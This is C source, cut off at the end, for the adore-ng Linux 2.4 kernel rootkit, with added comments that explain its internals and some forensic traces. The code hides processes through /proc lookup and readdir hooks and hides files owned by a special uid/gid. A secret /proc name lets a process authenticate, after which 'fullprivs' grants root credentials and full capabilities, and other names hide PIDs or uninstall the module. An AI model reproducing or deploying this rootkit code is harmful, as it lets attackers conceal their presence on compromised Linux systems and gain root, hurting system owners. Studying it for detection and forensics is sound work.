/*** (C) 2004-2005 by Stealth
***
*** http://stealth.scorpions.net/rootkits
*** http://stealth.openwall.net/rootkits
***
***
*** (C)'ed Under a BSDish license. Please look at LICENSE-file.
*** SO YOU USE THIS AT YOUR OWN RISK!
*** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS.
*** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
***
*** -> Use ava to get all the things workin'.
***
***/
#define __KERNEL__
#define MODULE
#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/mount.h>
#include <linux/proc_fs.h>
#include <linux/capability.h>
#include <linux/net.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>
#include <net/sock.h>
#include <linux/un.h>
#include <net/af_unix.h>
#include "adore-ng.h"
/* Module parameters: the mount points whose directory listings get hooked.
 * proc_fs and root_fs default to /proc and /; opt_fs is NULL unless given
 * (how a NULL opt_fs is treated at install time is outside this chunk). */
char *proc_fs = "/proc"; /* default proc FS to hide processes */
MODULE_PARM(proc_fs, "s");
char *root_fs = "/"; /* default FS to hide files */
MODULE_PARM(root_fs, "s");
char *opt_fs = NULL; /* optional third filesystem to filter; none by default */
MODULE_PARM(opt_fs, "s");
/* Signature of a 2.4-era VFS readdir operation (file, filldir cookie, filldir callback). */
typedef int (*readdir_t)(struct file *, void *, filldir_t);
/* Originals of the operations the hooks replace, so each hook can chain to the
 * real implementation; their restoration is presumably done by unpatch_vfs()
 * (cut off at the end of this chunk). */
readdir_t orig_root_readdir = NULL, orig_opt_readdir = NULL,
orig_proc_readdir = NULL;
struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *) = NULL;
/* Forward declaration (K&R-style empty parameter list); called from adore_lookup(). */
int cleanup_module();
/* Declared here, defined outside this chunk. */
static int tcp_new_size();
/* Judging by the name, the saved original of a /proc/net/tcp get_info handler;
 * the hook that uses it is not in this chunk. */
static int (*o_get_info_tcp)(char *, char **, off_t, int);
/* Kernel helper: resolve an fd to its struct socket, taking a reference on its file. */
extern struct socket *sockfd_lookup(int fd, int *err);
/* Drop the file reference that sockfd_lookup() took on a socket.
 * Presumably mirrors the kernel's own helper of the same name for kernel
 * trees that do not export it. */
extern __inline__ void sockfd_put(struct socket *sock)
{
	fput(sock->file);
}
#ifndef PID_MAX
#define PID_MAX 0x8000 /* fallback when the kernel headers do not define it */
#endif
/* One bit per PID; a set bit means the process is filtered out of /proc.
 * PID_MAX/8+1 bytes so that index (PID_MAX-1)/8 is always inside the array. */
static char hidden_procs[PID_MAX/8+1];
/* Set the hidden bit for PID x.
 * PIDs at or above PID_MAX are ignored, and PID 1 (init) is never hidden.
 * pid_t is signed, so a negative x is not rejected: x%8 is then negative,
 * which makes the shift undefined, and larger magnitudes index in front
 * of hidden_procs. */
inline void hide_proc(pid_t x)
{
	if (x >= PID_MAX || x == 1)
		return;
	hidden_procs[x/8] |= 1<<(x%8);
}
/* Clear the hidden bit for PID x; PIDs at or above PID_MAX are ignored.
 * Same negative-x caveat as hide_proc(): there is no lower-bound check. */
inline void unhide_proc(pid_t x)
{
	if (x >= PID_MAX)
		return;
	hidden_procs[x/8] &= ~(1<<(x%8));
}
/* Return non-zero if PID x has its hidden bit set, 0 otherwise (also 0 for
 * PIDs at or above PID_MAX). The result is the masked byte truncated to char,
 * so callers must test it for zero/non-zero only. No lower-bound check on x. */
inline char is_invisible(pid_t x)
{
	if (x >= PID_MAX)
		return 0;
	return hidden_procs[x/8]&(1<<(x%8));
}
/* There's some crap after the PID-filename on proc
* getdents() so the semantics of this function changed:
* Make "672" -> 672 and
* "672|@\" -> 672 too
*/
/* Parse the leading run of decimal digits of str into an int and ignore
 * whatever follows it: "672" -> 672, "672|@\" -> 672, "" or "abc" -> 0.
 * No sign, no leading whitespace, no overflow detection. */
int adore_atoi(const char *str)
{
	int value = 0;
	const char *cur = str;

	/* Forward scan over the digit prefix; each step shifts the previous
	 * digits up one decimal place, which yields the same number as
	 * weighting the digits back-to-front. */
	while (*cur >= '0' && *cur <= '9') {
		value = value * 10 + (*cur - '0');
		cur++;
	}
	return value;
}
/* Own implementation of find_task_by_pid() */
/* Own implementation of find_task_by_pid(): walk the task list under
 * tasklist_lock and return the task_struct with the given pid, or NULL.
 * The read lock is released before the pointer is returned, so nothing
 * keeps the task alive for the caller; should_be_hidden() dereferences
 * it immediately afterwards. */
struct task_struct *adore_find_task(pid_t pid)
{
	struct task_struct *p;
	read_lock(&tasklist_lock); // XXX: locking necessary?
	for_each_task(p) {
		if (p->pid == pid) {
			read_unlock(&tasklist_lock);
			return p;
		}
	}
	read_unlock(&tasklist_lock);
	return NULL;
}
/* Decide whether pid is filtered out of /proc.
 * Returns 1 if the PID's own bit is set, or if its parent is hidden; in the
 * latter case the child's bit is set as well, so hiding is inherited and
 * sticks even after the parent exits. Returns 0 for PIDs with no task.
 * The parent pointer field differs between the RedHat 9 kernel (p->parent)
 * and stock 2.4 (p->p_pptr); task_lock(p) is held while it is read. */
int should_be_hidden(pid_t pid)
{
	struct task_struct *p = NULL;
	if (is_invisible(pid)) {
		return 1;
	}
	p = adore_find_task(pid);
	if (!p)
		return 0;
	/* If the parent is hidden, we are hidden too XXX */
	task_lock(p);
#ifdef REDHAT9
	if (is_invisible(p->parent->pid)) {
#else
	if (is_invisible(p->p_pptr->pid)) {
#endif
		task_unlock(p);
		hide_proc(pid);
		return 1;
	}
	task_unlock(p);
	return 0;
}
/* You can control adore-ng without ava too:
*
* echo > /proc/<ADORE_KEY> will make the shell authenticated,
* cat /proc/hide-<PID> from such a shell will hide PID,
* cat /proc/unhide-<PID> will unhide the process
* cat /proc/uninstall will uninstall adore
*/
/* Replacement for the /proc inode lookup; doubles as the ava-less control
 * channel described above and as the process-hiding filter.
 *
 * Control path, matched on the looked-up name under task_lock(current):
 *   <ADORE_KEY>            marks the caller as authenticated: PF_AUTH is set
 *                          in current->flags and current->suid is set to
 *                          ADORE_VERSION (presumably so userland can read
 *                          the version back).
 *   fullprivs              (authenticated only) zeroes every uid/gid field
 *                          of current and fills all three capability sets.
 *   hide-<PID>/unhide-<PID> (authenticated only) toggle the PID's bit.
 *   uninstall              (authenticated only) calls cleanup_module() from
 *                          inside this hook, i.e. while it is still on the
 *                          stack and still holding task_lock(current).
 *
 * Hiding path: a lookup of a hidden PID returns NULL without instantiating
 * the dentry (the VFS presumably treats that as a negative lookup), unless
 * the caller itself is hidden, so a hidden ps can still see itself.
 * Anything else is passed through to the saved orig_proc_lookup().
 *
 * Memory-forensics artifacts left by the control path: PF_AUTH set in a
 * task's flags and suid == ADORE_VERSION on a task that has no reason to
 * carry either. */
struct dentry *adore_lookup(struct inode *i, struct dentry *d)
{
	task_lock(current);
	if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
		current->flags |= PF_AUTH;
		current->suid = ADORE_VERSION;
	} else if ((current->flags & PF_AUTH) &&
		strncmp(d->d_iname, "fullprivs", 9) == 0) {
		current->uid = 0;
		current->suid = 0;
		current->euid = 0;
		current->gid = 0;
		current->egid = 0;
		current->fsuid = 0;
		current->fsgid = 0;
		cap_set_full(current->cap_effective);
		cap_set_full(current->cap_inheritable);
		cap_set_full(current->cap_permitted);
	} else if ((current->flags & PF_AUTH) &&
		strncmp(d->d_iname, "hide-", 5) == 0) {
		hide_proc(adore_atoi(d->d_iname+5));
	} else if ((current->flags & PF_AUTH) &&
		strncmp(d->d_iname, "unhide-", 7) == 0) {
		unhide_proc(adore_atoi(d->d_iname+7));
	} else if ((current->flags & PF_AUTH) &&
		strncmp(d->d_iname, "uninstall", 9) == 0) {
		cleanup_module();
	}
	task_unlock(current);
	if (should_be_hidden(adore_atoi(d->d_iname)) &&
		/* A hidden ps must be able to see itself! */
		!should_be_hidden(current->pid))
		return NULL;
	return orig_proc_lookup(i, d);
}
/* The real filldir callback captured by adore_proc_readdir() for the duration
 * of one original readdir call. It is a single global, so proc_filldir_lock is
 * held across the whole call to keep concurrent /proc readdirs from
 * overwriting it. SPIN_LOCK_UNLOCKED is the 2.4-era static initializer. */
filldir_t proc_filldir = NULL;
spinlock_t proc_filldir_lock = SPIN_LOCK_UNLOCKED;
/* filldir shim for /proc: drop entries whose name parses to a hidden PID,
 * forward everything else to the captured callback. Returning 0 makes the
 * directory scan skip the entry and continue; non-PID names such as "self"
 * or "net" parse to 0 and are passed through. */
int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	if (should_be_hidden(adore_atoi(name)))
		return 0;
	return proc_filldir(buf, name, nlen, off, ino, x);
}
/* readdir hook for /proc: stash the caller's filldir in the global, then run
 * the original readdir with adore_proc_filldir as the callback.
 * The spinlock serializes every hooked /proc readdir on the system for the
 * full duration of the original call. Returns whatever the original returns. */
int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;
	spin_lock(&proc_filldir_lock);
	proc_filldir = filldir;
	r = orig_proc_readdir(fp, buf, adore_proc_filldir);
	spin_unlock(&proc_filldir_lock);
	return r;
}
/* Per-filesystem state for the optional third mount: the captured filldir
 * and a super_block slot per (current->pid % 1024), so concurrent readdirs
 * usually do not clobber each other. Deliberately unlocked; see the locking
 * rationale above root_filldir below. */
filldir_t opt_filldir = NULL;
struct super_block *opt_sb[1024];
/* filldir shim for the optional filesystem: look up each entry's inode on the
 * super_block recorded by adore_opt_readdir() for this PID slot and drop the
 * entry when it is owned by ELITE_UID:ELITE_GID; everything else goes to the
 * captured callback. An iget() failure also drops the entry (returns 0).
 * Costs one iget()/iput() pair per directory entry. The files themselves
 * stay on disk with that owner; only this live listing is filtered. */
int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	struct inode *inode = NULL;
	int r = 0;
	uid_t uid;
	gid_t gid;
	if ((inode = iget(opt_sb[current->pid % 1024], ino)) == NULL)
		return 0;
	uid = inode->i_uid;
	gid = inode->i_gid;
	iput(inode);
	/* Is it hidden ? */
	if (uid == ELITE_UID && gid == ELITE_GID) {
		r = 0;
	} else
		r = opt_filldir(buf, name, nlen, off, ino, x);
	return r;
}
/* readdir hook for the optional filesystem: record the caller's filldir and
 * the directory's super_block (in this PID's slot), then run the original
 * readdir with adore_opt_filldir as the callback. Returns 0 when fp or its
 * vfsmount is missing, otherwise the original's return value. No locking,
 * by design; see the note above root_filldir. */
int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;
	if (!fp || !fp->f_vfsmnt)
		return 0;
	opt_filldir = filldir;
	opt_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
	r = orig_opt_readdir(fp, buf, adore_opt_filldir);
	return r;
}
/* About the locking of these global vars:
* I used to lock these via rwlocks but on SMP systems this can cause
* a deadlock because the iget() locks an inode itself and I guess this
* could cause a locking situation of AB BA. So, I do not lock root_sb and
* root_filldir (same with opt_) anymore. root_filldir should anyway always
* be the same (filldir64 or filldir, depending on the libc). The worst thing that
* could happen is that 2 processes call filldir where the 2nd is replacing
* root_sb which affects the 1st process which AT WORST CASE shows the hidden files.
* Following conditions have to be met then: 1. SMP 2. 2 processes calling getdents()
* on 2 different partitions with the same FS.
* Now, since I made an array of super_blocks it must also be that the PIDs of
these procs have to be the same PID modulo 1024. This situation (all 3 cases must
* be met) should be very very rare.
*/
/* Same scheme as opt_filldir/opt_sb, for the root filesystem: captured
 * filldir plus one super_block slot per (current->pid % 1024), unlocked for
 * the reasons given in the comment above. */
filldir_t root_filldir = NULL;
struct super_block *root_sb[1024];
/* filldir shim for the root filesystem: look up each entry's inode on the
 * super_block recorded by adore_root_readdir() for this PID slot and drop the
 * entry when it is owned by ELITE_UID:ELITE_GID; everything else goes to the
 * captured callback. An iget() failure also drops the entry (returns 0).
 * Costs one iget()/iput() pair per directory entry. The files themselves
 * stay on disk with that owner; only this live listing is filtered, which
 * is what a comparison against an unhooked enumeration would expose. */
int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	struct inode *inode = NULL;
	int r = 0;
	uid_t uid;
	gid_t gid;
	if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)
		return 0;
	uid = inode->i_uid;
	gid = inode->i_gid;
	iput(inode);
	/* Is it hidden ? */
	if (uid == ELITE_UID && gid == ELITE_GID) {
		r = 0;
	} else
		r = root_filldir(buf, name, nlen, off, ino, x);
	return r;
}
/* readdir hook for the root filesystem: record the caller's filldir and the
 * directory's super_block (in this PID's slot), then run the original readdir
 * with adore_root_filldir as the callback. Returns 0 when fp or its vfsmount
 * is missing, otherwise the original's return value. No locking, by design;
 * see the note above root_filldir. */
int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;
	if (!fp || !fp->f_vfsmnt)
		return 0;
	root_filldir = filldir;
	root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
	r = orig_root_readdir(fp, buf, adore_root_filldir);
	return r;
}
/* Install new_readdir as the readdir operation reached through path p.
 * The path is opened only to get at its f_op table; f_op points at the
 * filesystem driver's operations table, so (that table being shared) the
 * write presumably affects every directory of that filesystem, not just p.
 * The previous pointer is saved through orig_readdir when it is non-NULL.
 * Returns 0 on success, -1 if the open fails.
 * The rewritten readdir pointer, which afterwards points into this module
 * instead of the filesystem driver, is the artifact an f_op integrity
 * check compares against. */
int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
	struct file *filep;
	filep = filp_open(p, O_RDONLY, 0);
	if (IS_ERR(filep))
		return -1;
	if (orig_readdir)
		*orig_readdir = filep->f_op->readdir;
	filep->f_op->readdir = new_readdir;
	filp_close(filep, 0);
	return 0;
}
int unpatch_vfs(const char *p, readdir_t orig_readdir)